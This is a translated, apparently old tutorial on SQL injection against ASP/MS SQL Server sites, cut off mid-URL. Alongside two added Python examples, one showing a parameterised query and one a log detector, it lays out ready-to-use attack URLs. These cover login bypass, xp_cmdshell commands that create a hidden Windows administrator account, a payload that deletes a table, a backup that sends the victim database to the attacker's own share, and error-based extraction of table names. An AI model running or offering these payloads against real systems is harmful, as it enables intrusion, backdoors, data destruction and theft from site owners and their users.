Preface:
This article is something I wrote a long time ago. After writing it, I learned that isno had also written an article; after reading isno's article I found many mistakes in mine. Later I made some modifications to this article, hoping it will help readers.
[What is SQL Injection]
SQL Injection, also called an SQL command insertion attack, is mainly caused by insufficient input validation. It describes attacking an application by submitting specially crafted SQL code.
[Principles of SQL Injection]
Generally, a website's login page with account and password fields builds its SQL statement like this (ASP):
"Select * from member where UID='" & request("ID") & "' and Passwd='" & request("Pwd") & "'"
If a normal user enters the account pl and the password 1234, the program executes
select * from member where UID='pl' and Passwd='1234'
The account, password and other input replace the variables in the ASP (or PHP, JSP) code and are enclosed in two single quotes. If the attacker knows that an admin account exists in the system, entering admin' -- as the account gets into the database without a password. The resulting statement is
Select * from member where UID='admin' --' and Passwd=''
(Note: anything after the "--" symbol is treated as a comment, so the And clause in the example above is ignored by SQL.)
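To show what the single quote and the "--" comment do to the member query above, here is an added example (not code from the original article) that rebuilds the query in Python; it uses an in-memory SQLite table in place of SQL Server, and the sample accounts are constructed.

```python
import sqlite3

def make_db():
    """Constructed sample data standing in for the article's member table
    (added example; SQLite is used so the code runs without SQL Server)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE member (UID TEXT, Passwd TEXT)")
    conn.executemany("INSERT INTO member VALUES (?, ?)",
                     [("admin", "s3cret"), ("pl", "1234")])
    return conn

def build_concat_sql(uid, pwd):
    """Build the statement the way the ASP page does: request("ID") and
    request("Pwd") are pasted straight into the SQL text between quotes."""
    return ("SELECT * FROM member WHERE UID='" + uid
            + "' AND Passwd='" + pwd + "'")

def login_concat(conn, uid, pwd):
    """Vulnerable login: user input becomes part of the SQL statement."""
    return conn.execute(build_concat_sql(uid, pwd)).fetchone() is not None

def login_param(conn, uid, pwd):
    """Hardened login: the same query with bound parameters. The driver
    sends the input as data, so a quote or -- cannot alter the statement."""
    sql = "SELECT * FROM member WHERE UID=? AND Passwd=?"
    return conn.execute(sql, (uid, pwd)).fetchone() is not None

if __name__ == "__main__":
    db = make_db()
    print(build_concat_sql("admin' --", ""))   # the statement from the article
    print("pl/1234:", login_concat(db, "pl", "1234"), login_param(db, "pl", "1234"))
    # "admin' --" with an empty password: the comment swallows the password
    # check in the concatenated version only.
    print("admin' --:", login_concat(db, "admin' --", ""),
          login_param(db, "admin' --", ""))
```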
[Vulnerability Detection]
In most cases we do not know the source code of the target application, and no scanner can reliably discover an SQL injection vulnerability, so we have to detect it manually. Since single quotation marks, semicolons, commas, colons and "--" have special meaning in SQL statements, we can append these characters to the URL or enter them in the text boxes of a form. For example:
http://jsw/new.asp?id=1'
http://jsw/new.asp?id=1;
Whether the SQL injection vulnerability exists is judged from the information the page returns. This test only shows whether the characters are filtered. The returned information varies with the IIS configuration; sometimes it shows
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5
It may also be "HTTP 500 - Internal Server Error", or the page may display normally. The judgment depends on experience, because many servers do not show any error at all.
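Since these probes are recorded in the web server log, here is an added example (not part of the original article) of detection logic a defender could run over IIS-style log lines. The field layout (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status) and the log lines are constructed assumptions; the patterns cover the characters and statement fragments used throughout this article.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from the probes in this article: quote, semicolon, "--",
# UNION SELECT, EXEC, xp_/sp_ procedures, INFORMATION_SCHEMA. Matched after
# URL-decoding the query string, so "%27" and "+" are handled.
PATTERNS = [
    ("quote", re.compile(r"'")),
    ("semicolon", re.compile(r";")),
    ("comment", re.compile(r"--")),
    ("union_select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("exec", re.compile(r"\bexec(ute)?\b", re.I)),
    ("ext_proc", re.compile(r"\b(xp|sp)_\w+", re.I)),
    ("info_schema", re.compile(r"information_schema", re.I)),
]

def analyze_line(line):
    """Parse one constructed W3C-style line:
    date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
    and return the names of the indicators found (empty if clean)."""
    parts = line.split()
    if len(parts) < 7 or parts[5] == "-":
        return []
    query = unquote_plus(parts[5])
    hits = [name for name, rx in PATTERNS if rx.search(query)]
    if hits and parts[6] == "500":
        hits.append("http500")   # error page next to a probe: stronger signal
    return hits

def scan(lines):
    """Return (line_number, hits) for every suspicious line."""
    results = []
    for n, line in enumerate(lines, 1):
        hits = analyze_line(line)
        if hits:
            results.append((n, hits))
    return results

# Constructed sample log (not real traffic); the probes mirror this article.
SAMPLE_LOG = [
    "2003-05-01 10:00:01 10.0.0.5 GET /new.asp id=1 200",
    "2003-05-01 10:00:09 10.0.0.5 GET /new.asp id=1%27 500",
    "2003-05-01 10:00:15 10.0.0.5 GET /news.asp id=2;exec+master.dbo.xp_cmdshell+%27ping+10.0.0.5%27 200",
    "2003-05-01 10:00:22 10.0.0.5 GET /index.asp id=10+union+select+top+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+-- 500",
    "2003-05-01 10:01:00 10.0.0.9 GET /index.asp category=food 200",
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(n, hits)
```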
[Execute system commands]
The SQL injection attack method originated from the 'or '1'='1 vulnerability (let us call it a vulnerability for now). I assume you know the principle of this vulnerability: exec sp_addlogin hax (adds a hax login to the database). But this method is very restricted. First, the SQL Server account used by the ASP must be an administrator; second, the variable submitted in the request must be at the end of the whole SQL statement, because some programmers write
SELECT * FROM news WHERE id =... AND topic =... AND .....
If the database is requested with
news.asp?id=2;exec sp_addlogin hax
it becomes
SELECT * FROM news WHERE id=2;exec sp_addlogin hax AND topic= AND
After the sp_addlogin stored procedure the statement still contains an AND clause, so the whole statement has a syntax error and sp_addlogin does not run. Therefore try the following:
news.asp?id=2;exec sp_addlogin hax;--
The trailing -- turns the condition after sp_addlogin into a comment, so there is no syntax error and sp_addlogin executes normally.
How can we tell whether our command was executed successfully? First install a firewall, enable alerts for ICMP, TCP 139 and TCP 445, then submit
news.asp?id=2;exec master.dbo.xp_cmdshell 'ping your ip'
If the firewall reports that someone is pinging you, it is certain that the other side's ASP runs with SQL administrator permissions, and you also learn the exact location of their SQL Server, because many larger websites separate the web server from the database server for performance. When the other side has installed the patch and you cannot see the source code, I think this is the only way to quickly locate the target SQL Server.
Let's use them together.
news.asp?id=2;exec master.dbo.sp_addlogin hax;--
news.asp?id=2;exec master.dbo.sp_password null,hax,hax;--
news.asp?id=2;exec master.dbo.sp_addsrvrolemember sysadmin hax;--
news.asp?id=2;exec master.dbo.xp_cmdshell 'net user hax /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators hax /add';--
In this way you have left a hax administrator account in both the database and the operating system.
Of course, you can also try adding a ' after id=2, mainly to see how the other side's ASP is written.
Using the master..xp_cmdshell extended stored procedure we can execute any command on the target host; xp_startmail, xp_sendmail and sp_makewebtask are similar, and their usage resembles master..xp_cmdshell, so I will not discuss them here. Note that the prerequisite for this attack is that the ASP uses the administrator account, so do not bother trying it against virtual hosting, where the vulnerability will not exist.
Next we discuss how to attack if the other side does not use the SQL administrator account.
[Attacks on databases]
The SQL account used by ASP, even when it is not the administrator, is usually the owner of a database, or at least has high management permissions on it. You can try
http://jsw/something.asp?newid=117;select 123;--
A syntax error is reported: select 123 is incorrect. Obviously the ASP appends a ' after the newid variable.
Then try http://jsw/something.asp?newid=117';delete news;--
Haha, I think the data in the database will be deleted as long as the table name is guessed right.
Another way is to submit
news.asp?id=2;declare @a;set @a=db_name();backup database @a to disk='\\your IP address\your shared directory\bak.dat',name='test';--
Haha, your firewall should have raised a warning that someone connected to your port 445 or 139 (139 for Win9x), which exposes the IP address of the other side's SQL Server. Actually, backing up their database to your hard disk is a bit much; if the other side's database is very large, you may have to dial up again before you get back online.
[Extract arbitrary information from the database]
This is an important part of this article. Generally, SQL statements used to query data take the following form:
something.asp:
v_cat = request("category")
sqlstr = "SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs = conn.execute(sqlstr)
Then we submit to the ASP file containing the above code
http://jsw/index.asp?category=food' or 1=1 --'
The program then builds
SELECT * FROM product WHERE PCategory='food' or 1=1 --'
That is, by submitting illegal values to this ASP script we can make it execute the SQL statement we want.
The following describes how to use SQL injection in an attack process.
When using SQL injection we first need to obtain the structure of the target database, so we submit
http://jsw/index.asp?id=10 union select top 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES --
INFORMATION_SCHEMA.TABLES contains the names of all tables in the database. The SQL statement we submit,
select top 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES --
is used to obtain the first table name in the database. When MS SQL Server tries to execute this statement, the following information is returned:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the nvarchar value 'syssegments' to a column of data type int.
/index.asp, line 5
The ODBC error message contains exactly what we want. Now we have the first table name in the database, "syssegments", which is generated automatically when the database is created. Next we continue to submit:
http://jsw/index.asp?id=10 union select top 1 TABLE_NAME FROM INFORMATION_SC